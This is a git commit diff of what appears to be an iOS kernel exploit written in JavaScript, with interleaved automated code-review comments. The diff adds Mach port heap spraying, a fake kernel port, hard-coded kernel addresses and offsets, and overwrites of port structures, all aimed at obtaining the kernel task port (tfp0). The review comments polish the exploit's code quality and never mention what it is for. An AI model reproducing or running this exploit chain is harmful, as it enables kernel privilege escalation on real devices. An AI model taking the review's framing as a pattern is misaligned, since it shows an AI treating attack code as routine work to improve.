Diffstat (limited to 'src')
-rw-r--r--src/gen/main.c4
-rwxr-xr-xsrc/js/kexp/exploit.js141
-rwxr-xr-xsrc/js/lib/myutils.js5
-rw-r--r--src/js/primitives/call.js6
-rw-r--r--src/js/primitives/mem.js2
5 files changed, 152 insertions, 6 deletions
diff --git a/src/gen/main.c b/src/gen/main.c
index 0acc02b..4ee9e61 100644
--- a/src/gen/main.c
+++ b/src/gen/main.c
@@ -206,8 +206,8 @@ int main(int argc,
fprintf(stderr, "0x%x\n", RTLD_DEFAULT);
-// uint32_t stack_base = 0x1c7718; // my shell setup
- uint32_t stack_base = 0x1c7708; // my shell setup
+ uint32_t stack_base = 0x1c7718; // my shell setup
+// uint32_t stack_base = 0x1c7708; // my shell setup
// uint32_t stack_base = 0x1c7728; // my shell setup
// uint32_t stack_base = 0x1c77a8 ; // my 4s shell setup
// uint32_t stack_base = 0x1c2e48; // my lldb
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index 715535d..8447c46 100755
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -30,6 +30,16 @@ var req_init_port_set_address = 0x0;
var req_init_port_set_count = 0x4;
var MACH_RCV_MSG = 0x2;
var MACH_MSG_TIMEOUT_NONE = 0;
+var TASK_BSDINFO_OFFSET = 0x200;
+var BSDINFO_PID_OFFSET = 0x8;
+
+function find_kerneltask() {
+ return 0x8041200c;
+}
+
+function find_ipcspacekernel() {
+ return 0x80456664;
+}
var task_self = 0;
var kslide = 0;
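Review bot: `find_kerneltask` and `find_ipcspacekernel` are named as lookups but each body is a single literal return, and unlike `NDR_record` in call.js they are not selected by `build_for`, so the names promise more than the code does. Either declare them as plain constants next to `TASK_BSDINFO_OFFSET` and `BSDINFO_PID_OFFSET`, or put a comment on each such as `// hard-coded for the one build this file currently targets; see build_for in call.js`. The two `*_OFFSET` constants also lack any comment saying which structure they index, which nothing in this hunk states.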
@@ -58,7 +68,6 @@ var SIZEOF_BYTES_MSG = 384;
var PORTS_NUM = 1024;
var PORTS_NUM_PRESPRAY = 100;
var MIG_MAX = 0x1000;
-var NDR_record = 0x36ebf00c;
function spray_data(mem, size, num, portptr) {
var err = shit_heap(4);
@@ -272,6 +281,7 @@ function send_ports(target, payload, num, number_port_descs) {
}
function release_port_ptrs(port) {
+// var req = shit_heap(0x1c + (5 * 0xc) + 0x8);
var req = shit_heap(0x1c + (5 * 0xc) + 0x8);
// printf("%s\n", hexdump(read_buf(req, 0x1c + (5 * 0xc) + 0x8), 8, 2, req, 8, "0"));
var ret = mach_msg(req, MACH_RCV_MSG, 0, (0x1c + (5 * 0xc) + 0x8), port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
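Review bot: The added commented-out line is byte-identical to the live `var req = shit_heap(...)` directly beneath it, so it carries no information and should be deleted rather than committed. The same applies to the other commented-out scratch this commit adds: the `mach_task_self` line and the 16-line block in the next two exploit.js hunks, the `// while (true)` and `// var fake_port` lines in the last exploit.js hunk, and the four `// if (sptr_len > 100)` / `// call4arg(...)` lines in call.js. If any of it is meant as a reminder, a one-line `// TODO:` stating what is pending is clearer than dead code.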
@@ -286,6 +296,37 @@ function r3gister(task, init_port_set, real_count, fake_count) {
var InP = mess;
var OutP = mess;
+ /*
+ InP->msgh_body.msgh_descriptor_count = 1;
+ InP->init_port_set.address = (void*)(init_port_set);
+ InP->init_port_set.count = real_count;
+ InP->init_port_set.disposition = 19;
+ InP->init_port_set.deallocate = FALSE;
+ InP->init_port_set.type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
+ InP->NDR = NDR_record;
+ InP->init_port_setCnt = fake_count; // was real_count
+ InP->Head.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
+ InP->Head.msgh_remote_port = task;
+ InP->Head.msgh_local_port = mig_get_local_port();
+ InP->Head.msgh_id = 3403;
+ InP->msgh_body.msgh_descriptor_count 0x18 0x4
+ InP->init_port_set.address 0x1c 0x4
+ InP->init_port_set.count 0x20 0x4
+ InP->init_port_set 0x1c
+ InP->NDR 0x28 0x8
+ InP->init_port_setCnt 0x30 0x4
+ InP->Head.msgh_bits 0x0 0x4
+ InP->Head.msgh_remote_port 0x8 0x4
+ InP->Head.msgh_local_port 0xc 0x4
+ InP->Head.msgh_id 0x14 0x4
+0x00000003
+0x00000034 0x0000002c
+0x00000024
+50
+78
+0x0 0x1057ec
+ */
+
write_u32(InP + 0x18, 1);
write_u32(InP + 0x1c, init_port_set);
write_u32(InP + 0x20, real_count);
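Review bot: The block comment added above the `write_u32` calls is pasted scratch: a set of C assignments, an offset table, and then loose values (`0x00000003`, `50`, `78`, `0x0 0x1057ec`) with no explanation, and nothing ties it to the writes that follow. The useful part is the field-to-offset mapping, which belongs beside the code that uses it, e.g. `write_u32(InP + 0x18, 1); // msgh_body.msgh_descriptor_count`, so each magic offset is named where it is written. The trailing loose numbers should be dropped or given a one-word label, since a reader cannot tell what they were recorded from. `r3gister` begins and ends outside this hunk.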
@@ -305,10 +346,46 @@ function r3gister(task, init_port_set, real_count, fake_count) {
return ret;
}
+function mach_ports_lookup_shit() {
+ printf("fuck\n");
+ var arrz = shit_heap(4);
+ printf("fuck\n");
+ write_u32(arrz, 0);
+ printf("fuck\n");
+ var sz = shit_heap(4);;
+ printf("fuck\n");
+ write_u32(sz, 3);
+ printf("fuck\n");
+// var mts = mach_task_self();
+ printf("fuck\n");
+ calls4arg("mach_ports_lookup", task_self, arrz, sz, 0);
+ printf("mpl success\n");
+
+ return read_u32(read_u32(arrz) + 8);
+}
+
+var kernel_task_addr = 0;
function get_kernel_task() {
var ret = 0;
var tfp0 = 0;
+ /*
+ printf("fuck\n");
+ var arrz = shit_heap(4);
+ printf("fuck\n");
+ write_u32(arrz, 0);
+ printf("fuck\n");
+ var sz = shit_heap(4);;
+ printf("fuck\n");
+ write_u32(sz, 3);
+ printf("fuck\n");
+ var mts = mach_task_self();
+ printf("fuck\n");
+ mach_ports_lookup(mts, arrz, sz);
+ printf("mpl success\n");
+ return;
+*/
+
sanity_port = shit_heap(4);
task_self = mach_task_self();
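Review bot: `mach_ports_lookup_shit` ignores whatever `calls4arg` returns and immediately dereferences `read_u32(arrz)`; if the call did not populate `arrz` this reads through a zero pointer with no diagnostic, so the return value should at least be checked and printed before the `return read_u32(...)`. `var sz = shit_heap(4);;` has a stray second semicolon. The nine `printf("fuck\n")` trace lines make the function's five real statements hard to find and should be removed or gated behind a debug flag before this lands. The commented-out block added at the top of `get_kernel_task` is the same code as the new function and should go. `get_kernel_task` continues outside this hunk.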
@@ -351,6 +428,8 @@ function get_kernel_task() {
prepare_ptr(big_buf, big_size, kptr, 256);
prepare_ptr(small_buf, small_size, kptr, 32);
+again: while (true) {
+
var dummy = shit_heap(4);
for (var i = 0; i < PORTS_NUM_PRESPRAY; i++) {
spray(big_buf, big_size, dummy);
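Review bot: The `again:` label is never referenced: no `continue again` or `break again` appears in this hunk or the next, and the loop body (closed by the `}` added at the end of the last exploit.js hunk) ends in an unconditional `return tfp0;`, so `while (true)` runs exactly once and the label is dead. Either remove the loop and label, or state the retry condition it is meant to guard with a comment at the label, e.g. `// retry: jump back here when <condition>; currently never taken`. `get_kernel_task` starts and ends outside this hunk.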
@@ -374,13 +453,69 @@ function get_kernel_task() {
var arrmpt = shit_heap(8);
write_u32(arrmpt, 0);
write_u32(arrmpt + 4, 0);
+ mach_ports_lookup_shit();
var ret__ = r3gister(mach_task_self(), arrmpt, 2, 3);
- printf("%d %s", ret__, mach_error_string(ret__));
+ mach_ports_lookup_shit();
+ printf("%d %s\n", ret__, mach_error_string(ret__));
printf("r3gister done\n");
+// while (true) {
+ //
+// }
+ scall("printf", "done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp));
+ printf("fuck\n");
+// var fake_port = read_u32(read_u32(arrz) + 8);
+
+ /*
+ * BEGIN JANK FUCKING HACK
+ */
+ var fake_port = mach_ports_lookup_shit();
+ printf("fuck\n");
+ printf("%x\n", fake_port);
+ printf("fuck\n");
+ // todo: add mach_port_valid stuff
+ printf("fuck\n");
+
+ printf("fuck\n");
+ write_u32(kport + 0x50, kptr + 0x78 - TASK_BSDINFO_OFFSET);
+ printf("fuck\n");
+ write_u32(ptr, find_kerneltask() + kslide - BSDINFO_PID_OFFSET);
+ printf("fuck\n");
+ var tst_str = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\0";
+ printf("fuck\n");
+ var tst = _sptr(tst_str);
+ printf("fuck\n");
+ var kpbuf = tst + 4;
+ printf("fuck\n");
-
+ printf("fuck\n");
+ for (var i = 0; i < 2; i++) {
+ printf("fuck\n");
+ write_buf(kpbuf + (i * 0x78), read_buf(kport + (i * 0x78), 0x78), 0x78);
+ }
+ printf("fuck\n");
+ usleep(10000);
+ sched_yield();
+ mach_port_destroy(mach_task_self(), read_u32(fakeportData));
+ spray_data(tst, tst_str.length, 10, fakeportData);
+ printf("fuck\n");
+ printf("done realloc");
+ printf("fuck\n");
+
+ printf("fuck\n");
+ var kernel_task_addr = shit_heap(4);
+ printf("fuck\n");
+ scall("printf", "kernel_task address: 0x%08x\n", read_u32(kernel_task_addr));
+ ret__ = pid_for_task(fake_port, kernel_task_addr);
+ printf("%d %s\n", ret__, mach_error_string(ret__));
+ printf("fuck\n");
+ printf("IF YOU SEE THIS AND IT LOOKS LEGIT, SHIT HAS FUCKING HAPPENED\n");
+ printf("fuck\n");
+ call4arg(sym_cache["puts"], sptr("kernel_task address: 0x" + pad_left(read_u32(kernel_task_addr).toString(16), '0', 8)), 0, 0, 0);
+ scall("printf", "kernel_task address: 0x%08x\n", read_u32(kernel_task_addr));
+ printf("fuck\n");
printf("get lucky\n");
return tfp0;
+ }
}
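Review bot: `var kernel_task_addr = shit_heap(4);` inside `get_kernel_task` redeclares the name this commit also adds at module level (`var kernel_task_addr = 0;` in the earlier exploit.js hunk); because `var` is function-scoped the module-level binding is never written, so any later reader of the global sees `0`. Drop the `var` here (`kernel_task_addr = shit_heap(4);`) or drop the module-level declaration, whichever the rest of the file expects. The first `scall("printf", "kernel_task address: ...")` runs before `pid_for_task` has been called, so it prints whatever `shit_heap` handed back, not a result. `arrz` and `kp` on the `scall("printf", "done %x ...")` line have no declaration in this function in the visible hunks (the only `arrz` is local to `mach_ports_lookup_shit`), so unless they are defined elsewhere in the file that line throws a ReferenceError before anything below it runs. `printf("done realloc")` is also missing its `\n`.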
diff --git a/src/js/lib/myutils.js b/src/js/lib/myutils.js
index 71777f9..4424541 100755
--- a/src/js/lib/myutils.js
+++ b/src/js/lib/myutils.js
@@ -122,4 +122,7 @@ var dlsym = scall_wrapper("dlsym");
var CFDictionaryCreateMutable = scall_wrapper("CFDictionaryCreateMutable");
var CFDictionarySetValue = scall_wrapper("CFDictionarySetValue");
var CFNumberCreate = scall_wrapper("CFNumberCreate");
-var mig_get_reply_port = scall_wrapper("mig_get_reply_port"); \ No newline at end of file
+var mig_get_reply_port = scall_wrapper("mig_get_reply_port");
+var mach_ports_lookup = scall_wrapper("mach_ports_lookup");
+var mach_port_destroy = scall_wrapper("mach_port_destroy");
+var pid_for_task = scall_wrapper("pid_for_task"); \ No newline at end of file
diff --git a/src/js/primitives/call.js b/src/js/primitives/call.js
index dfd3077..760ca40 100644
--- a/src/js/primitives/call.js
+++ b/src/js/primitives/call.js
@@ -11,6 +11,7 @@ if (build_for == N94AP_13G37) {
var pthread_exit = 0x20633048 | 1;
var pthread_join = 0x20636af4 | 1;
var add_sp_0x3c = 0x23d72b5a | 1;
+ var NDR_record = 0x36ebf00c;
} else if (build_for == N78AP_13G36) {
var __stack_chk_fail_lazy_addy = 0x347f7c48;
var __stack_chk_fail_resolver = 0x23d751fc;
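Review bot: `NDR_record` is now declared only inside the two `build_for` branches (here and in the next hunk), while the unconditional `var NDR_record` was removed from exploit.js in the same commit; if `build_for` matches neither branch, hoisting leaves the name bound to `undefined` and `r3gister` writes it without any error. A trailing `else { throw new Error("unsupported build_for: " + build_for); }` on the `if` chain would make that failure explicit at load time. A short comment noting that the first value is the one previously hard-coded in exploit.js would also help the next reader see the move was value-preserving.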
@@ -19,6 +20,7 @@ if (build_for == N94AP_13G37) {
var pthread_exit = 0x20633048 | 1;
var pthread_join = 0x20636af4 | 1;
var add_sp_0x3c = 0x23d72b5a | 1;
+ var NDR_record = 0x364d200c;
}
var reserve_addr = 0x1a0000;
var sym_cache = {};
@@ -410,8 +412,12 @@ function scall() {
// printf("%s\n", args_to_pass.toString());
if (args_to_pass.length > 5 || force_callnarg) {
+// if (sptr_len > 100)
+// call4arg(sym_cache["puts"], sptr("callnarg"), 0, 0, 0);
return callnarg.apply(this, args_to_pass);
} else {
+// if (sptr_len > 100)
+// call4arg(sym_cache["puts"], sptr("call4arg"), 0, 0, 0);
var count_to_me = 5 - arguments.length;
for (var i = 0; i < count_to_me; i++) {
args_to_pass.push(0);
diff --git a/src/js/primitives/mem.js b/src/js/primitives/mem.js
index b5078eb..4025c2f 100644
--- a/src/js/primitives/mem.js
+++ b/src/js/primitives/mem.js
@@ -254,6 +254,7 @@ function _sptr(s) {
}
write_str(global_sptr_addy, s);
global_sptr_addy += s.length;
+ sptr_len += s.length;
return global_sptr_addy - s.length;
}
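Review bot: `sptr_len += s.length;` (and `sptr_len += v;` in the next hunk) updates a variable that neither hunk declares; if no `var sptr_len` exists elsewhere in the file, the compound assignment throws a ReferenceError on the first call, because `+=` reads the binding before writing it and sloppy mode only creates implicit globals on plain assignment. The only readers of `sptr_len` in this commit are the commented-out lines in call.js, so either declare it beside `global_sptr_addy` with a comment, e.g. `var sptr_len = 0; // bytes handed out by _sptr and shit_heap since reset`, or leave both increments out until something reads them. `_sptr` begins outside this hunk.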
@@ -281,6 +282,7 @@ function shit_heap(v) {
}
// write_str(global_sptr_addy, s);
global_sptr_addy += v;
+ sptr_len += v;
return global_sptr_addy - v;
}